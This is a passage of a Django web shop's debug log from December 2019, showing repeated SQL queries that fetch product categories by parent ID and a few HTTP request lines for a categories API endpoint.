"shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 10:43:25,495 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 10:43:25,497 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 10:43:25,500 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 10:43:25,503 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 10:43:25,506 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 10:43:25,510 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 10:43:25,512 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 10:43:25] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 10:46:48] "GET / HTTP/1.0" 302 0 [19/Dec/2019 10:51:51] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 10:52:02,394 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 10:52:02,400 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 10:52:02,403 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 10:52:02,406 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 10:52:02,409 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 10:52:02,412 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 10:52:02,414 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 10:52:02,416 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 10:52:02,418 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 10:52:02,422 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 10:52:02,424 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 10:52:02,426 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 10:52:02,428 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 10:52:02,431 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 10:52:02,434 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 10:52:02,436 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 10:52:02,439 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 10:52:02,441 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 10:52:02,443 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 10:52:02,447 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 10:52:02,451 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 10:52:02,453 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 10:52:02,456 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 10:52:02,459 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 10:52:02,461 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 10:52:02,464 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 10:52:02,466 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 10:52:02,468 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 10:52:02,471 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 10:52:02,473 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 10:52:02,476 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 10:52:02,478 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 10:52:02,481 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 10:52:02,483 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 10:52:02,486 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 10:52:02,490 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 10:52:02,493 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 10:52:02,495 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 10:52:02,497 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 10:52:02,499 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 10:52:02,501 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 10:52:02,504 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 10:52:02,507 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 10:52:02,509 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 10:52:02,512 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 10:52:02,514 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 10:52:02] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 10:53:57,320 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 10:53:57,327 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 10:53:57,330 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 10:53:57,333 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 10:53:57,337 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 10:53:57,340 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 10:53:57,345 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 10:53:57,349 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 10:53:57,353 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 10:53:57,359 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 10:53:57,362 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 10:53:57,365 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 10:53:57,368 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 10:53:57,370 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; 